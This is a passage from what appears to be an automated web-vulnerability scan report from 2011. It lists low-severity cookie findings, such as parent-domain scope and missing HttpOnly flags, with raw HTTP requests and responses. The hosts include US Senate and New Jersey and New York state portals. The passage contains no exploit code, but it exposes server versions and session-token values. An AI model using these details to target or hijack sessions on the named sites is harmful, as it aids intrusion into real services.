Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "a9a-48f2afe054800"
If-Modified-Since: Wed, 01 Sep 2010 04:18:40 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Cache-Control: max-age=418
Expires: Wed, 13 Jul 2011 02:06:36 GMT
Date: Wed, 13 Jul 2011 01:59:38 GMT
Connection: close
Set-Cookie: ccl=wj1HqN0mf/88OaLzQaD2+dQLJRv8wdQHGvAl27D3twW/DxLqTJXahfgnbRGYoUOIKVBrIsfTyWmD+LeXVMkGZjreOV1XSiLWfQeToJiTN6/MP3ur9Fk+TLxUgCNGFqsm0ZH5uwqmzOR8OhHqQfWbXUa6ID4j4T2NC1X5iaDLigBhjzpNUF26WY72wPWbQp01HaSDNytaSod4G6It8FL0wN0152nDp/eHRDA81nhZL1wGrH6EyYBx4JodHgeAGHwNG76mnLxDNL7N8yeHw9ruwTZo1BuDBRfuH56WwFbdWzua9s8v5vqECPNa9oUpkUBb6YqGJYwwkdE6+V7mA4WkVPb31Fq0C8p31qhe1R+J4C5HoU7gZJycSFtDWzk8tS8JPzj5y4L7gxdAMfYh+zqkixXLx4YQi3WQLtAF15r2hAeef5mgYJExuQrg9s9hEueOHUS2apbL1IFPdihDoGHvCpo9dvGEWwMuhkDyEP0Kn81boO+m3ZhOwGX8JkfKNQHxl14p2YTLx3k2YVZ266qYhbKlMbAWmvKCzb3BH0c587Zb9ZwzTFqLw6mE3pfCjadj; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


6.11. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

6.12. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

6.13. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11791
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write ('<!-- -- START: POP TYPE CONTROLS -- --> \n');
docume
...[SNIP]...

6.14. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:04 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: Mozilla
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

6.15. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

6.16. http://www.facebook.com/NewJerseyLottery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /NewJerseyLottery

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=I_ocTk6Zw7qrIicWqdkAsyEn; expires=Fri, 12-Jul-2013 01:51:31 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=pn98H; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.42
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 34241

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

6.17. http://www.facebook.com/feeds/page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /feeds/page.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /feeds/page.php?id=147895761925432&format=rss20 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-type: application/rss+xml
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Tue, 12 Jul 2011 17:29:20 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=JPocTlXdVySIX-Z4nYzhuuHn; expires=Fri, 12-Jul-2013 01:51:32 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=-8Odz; path=/; domain=.facebook.com
X-FB-Server: 10.54.156.43
Connection: close
Date: Wed, 13 Jul 2011 01:51:32 GMT
Content-Length: 37858

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
xmlns:media="http://search.yahoo.com/mrss/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
>
<channel>
<title>New Jersey Lo
...[SNIP]...

6.18. http://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:FF=0:TM=1308589662:LM=1310521893:S=z4pmIJAj-KHt9ejB; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world&#39;s information, including webpages, images, videos a
...[SNIP]...

6.19. http://www.google.com/reviews/scripts/annotations_bootstrap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /reviews/scripts/annotations_bootstrap.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reviews/scripts/annotations_bootstrap.js HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521893:S=5yFQy_JU0BcdCdTy; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Wed, 13 Jul 2011 01:51:33 GMT
Server: zfe
X-XSS-Protection: 1; mode=block
Connection: close


(function(){
window['google'] = window['google'] || {};
window['google']['annotations'] = window['google']['annotations'] || {};
if (!window['google']['annotations']['loaded']) {
window['google']['an
...[SNIP]...

6.20. http://www.youtube.com/NewJerseyGovernment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /NewJerseyGovernment

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyGovernment HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=wAQMWIHYLkY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmhDekhtTGY2U282SEp5SmNxQXo0OTB0cEFQaU9sa2IzcGdmbVBIcmM1WWVn -->
<head>



...[SNIP]...

6.21. http://www.youtube.com/newjerseylottery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /newjerseylottery

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newjerseylottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=TlJvxUF36FY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpXZ2p5bkc3YWk5QVpReFYzTHhKaUtxb29Ha0x4MERGcVhDOWhJUjdVOWVn -->
<head>



...[SNIP]...

7. Cookie without HttpOnly flag set  previous  next
There are 59 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. http://brothercake.com/site/resources/scripts/onload/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://brothercake.com
Path:   /site/resources/scripts/onload/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/resources/scripts/onload/ HTTP/1.1
Host: brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
Set-Cookie: PHPSESSID=0f9d7399c64f0eda356a3e3cb4ab4659; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

   <meta htt
...[SNIP]...

7.2. http://gillibrand.senate.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://gillibrand.senate.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: gillibrand.senate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:45 GMT
Server: Apache
Set-Cookie: CFID=96178972;expires=Fri, 05-Jul-2041 01:53:08 GMT;path=/
Set-Cookie: CFTOKEN=29227467;expires=Fri, 05-Jul-2041 01:53:08 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_efgbvmu=ffffffffc3a01b5745525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 28271


                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><ht
...[SNIP]...

7.3. http://iapps.courts.state.ny.us/webcivil/ecourtsMain  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://iapps.courts.state.ny.us
Path:   /webcivil/ecourtsMain

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webcivil/ecourtsMain HTTP/1.1
Host: iapps.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:08 GMT
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=D636678843A73841A17417BB6EA6327A.server26154; Path=/webcivil
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 20060
Connection: close
Set-Cookie: TS9291af=ea95e8d9d89fc909cf6e92131f35ea589037abba2ec9e5cc4e1cfa48; Path=/
Set-Cookie: TS2942a5=1c8ac255b8964f2872b59e174560f4a89037abba2ec9e5cc4e1cfa4860ac0ec51d94d266; Path=/webcivil

<html>
<head>
<title>eCourts</title>
<meta http-equiv="Content-type" content="text/html; charset=ISO-8859-1" />
<link href="css/ucs_ie3nn4.css" rel="stylesheet" type="text/css" />
<link rel="styleshee
...[SNIP]...

7.4. http://schumer.senate.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://schumer.senate.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: schumer.senate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:49 GMT
Server: Apache
Set-Cookie: CFID=96178681;expires=Fri, 05-Jul-2041 01:52:02 GMT;path=/
Set-Cookie: CFTOKEN=82652451;expires=Fri, 05-Jul-2041 01:52:02 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_efgbvmu=ffffffffc3a01b5745525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 52455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Senator Charles E. Schumer</title>
<meta http-equiv="Content-Type" conte
...[SNIP]...

7.5. http://visitnj.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://visitnj.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:03 GMT
ETag: "b64f70a6778aaba742ca2cb12822f6ab"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...

7.6. http://www.benjaminsterling.com/experiments/jqShuffle/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.benjaminsterling.com
Path:   /experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 13 Jul 2011 01:51:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=40f8063ce3de4e5e1f3d46f732744157; path=/
Last-Modified: Wed, 13 Jul 2011 01:51:21 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.7. http://www.cio.ny.gov/universal_broadband  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cio.ny.gov
Path:   /universal_broadband

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:22 GMT
Cache-Control: must-revalidate
Connection: close
Content-Length: 34252
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<met
...[SNIP]...

7.8. http://www.cs.state.ny.us/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cs.state.ny.us
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cs.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:29 GMT
Server: Apache
Set-Cookie: CFID=38248036;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Set-Cookie: CFTOKEN=85624385;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">


<html lang="en-US">
<head>
   <title>New York State Department of Civil Service</title>
   <meta
...[SNIP]...

7.9. https://www.mybenefits.ny.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.mybenefits.ny.gov
